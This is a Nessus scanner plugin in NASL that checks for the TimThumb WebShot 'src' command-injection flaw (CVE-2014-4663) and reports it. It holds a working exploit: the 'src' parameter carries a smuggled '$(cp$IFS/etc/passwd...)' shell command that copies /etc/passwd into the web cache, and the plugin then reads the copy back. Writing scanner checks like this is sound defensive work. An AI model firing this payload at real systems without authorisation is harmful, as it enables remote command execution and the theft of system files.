CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
AI Score
Confidence
Low
EPSS
Percentile
94.7%
The TimThumb ‘timthumb.php’ script installed on the remote host is affected by a remote command execution vulnerability due to a failure to properly sanitize user-supplied input to the ‘src’ parameter. A remote, unauthenticated attacker can leverage this issue to execute arbitrary commands on the remote host.
Note that the script is only affected when the ‘WebShot’ feature is enabled.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(76874);
script_version("1.12");
script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");
script_cve_id("CVE-2014-4663");
script_bugtraq_id(68180);
script_xref(name:"EDB-ID", value:"33851");
script_name(english:"TimThumb 'timthumb.php' WebShot 'src' Parameter Remote Command Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a PHP script that is affected by a remote
command execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The TimThumb 'timthumb.php' script installed on the remote host is
affected by a remote command execution vulnerability due to a failure
to properly sanitize user-supplied input to the 'src' parameter. A
remote, unauthenticated attacker can leverage this issue to execute
arbitrary commands on the remote host.
Note that the script is only affected when the 'WebShot' feature is
enabled.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2014/Jun/117");
script_set_attribute(attribute:"see_also", value:"https://code.google.com/p/timthumb/source/detail?r=219");
script_set_attribute(attribute:"solution", value:
"Upgrade to version 2.8.14 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2014-4663");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2014/06/24");
script_set_attribute(attribute:"patch_publication_date", value:"2014/06/26");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/07/28");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
script_set_attribute(attribute:"cpe", value:"cpe:/a:binarymoon:timthumb");
script_set_attribute(attribute:"cpe", value:"cpe:/a:timthumb:timthumb");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2014-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("wordpress_detect.nasl", "wordpress_timthumb_detect.nbin");
script_require_keys("installed_sw/WordPress", "installed_sw/TimThumb", "www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");
include("data_protection.inc");
app = "WordPress";
plugin = "TimThumb";
get_install_count(app_name:plugin, exit_if_zero:TRUE);
port = get_http_port(default:80, php:TRUE);
install = get_single_install(
app_name : plugin,
port : port
);
dir = install['path'];
install_url = build_url(port:port, qs:dir);
token = rand_str();
# Send request to script to generate an error and get the full path
res = http_send_recv3(
method : "GET",
port : port,
item : dir + "?webshot=0&src=http://localhost/$(nessus-" +token+ ")",
exit_on_fail : TRUE
);
if ("A TimThumb error has" >< res[2])
{
match = pregmatch(pattern:"Mimetype = ''((.+)/cache/)", string:res[2]);
if (!isnull(match))
path = match[1];
}
if (path == "" || isnull(path))
exit(0, "Unable to obtain the full path to the " +plugin+ " script at " +
install_url + ".");
script = SCRIPT_NAME - ".nasl" + "-" + unixtime();
file = "/etc/passwd";
attack = "?webshot=1&src=http://localhost/$(cp$IFS" + file +"$IFS" + path +
script + ".txt)";
res = http_send_recv3(
method : "GET",
port : port,
item : dir + attack,
exit_on_fail : TRUE
);
out_path = NULL;
report_url = NULL;
# Get path without the *.php script name appended to it
match2 = pregmatch(pattern:"(^.*)(/.+\.php)$", string:dir);
if (!isnull(match2))
out_path = match2[1];
match3 = pregmatch(pattern:"(^.*)(/.+\.php)$", string:install_url);
if (!isnull(match3))
report_url = match3[1];
if (
(isnull(out_path) || out_path == "") ||
(isnull(report_url) || report_url == "")
)
exit(1, "Failed to parse required path data");
# Verify our attack worked
report_url = report_url + "/cache/" + script + ".txt";
out_path = out_path + "/cache/" + script + ".txt";
res2 = http_send_recv3(
method : "GET",
port : port,
item : out_path,
exit_on_fail : TRUE
);
if (egrep(pattern:"root:.*:0:[01]:", string:res2[2]))
{
report = NULL;
attach_file = NULL;
output = NULL;
req = install_url + attack;
request = NULL;
if (report_verbosity > 0)
{
report =
'\n' + 'Nessus was able to exploit the issue to retrieve the contents of ' +
'\n' + '"' + file + '" using the following request :' +
'\n' +
'\n' + report_url +
'\n' +
'\n' + 'The file was created with the following request : '+
'\n' +
'\n' + req +
'\n';
if (report_verbosity > 1)
{
output = data_protection::redact_etc_passwd(output:res2[2]);
attach_file = file;
request = make_list(req);
}
}
security_report_v4(port:port,
extra:report,
severity:SECURITY_WARNING,
request:request,
file:attach_file,
output:output);
}
else audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin+ " script");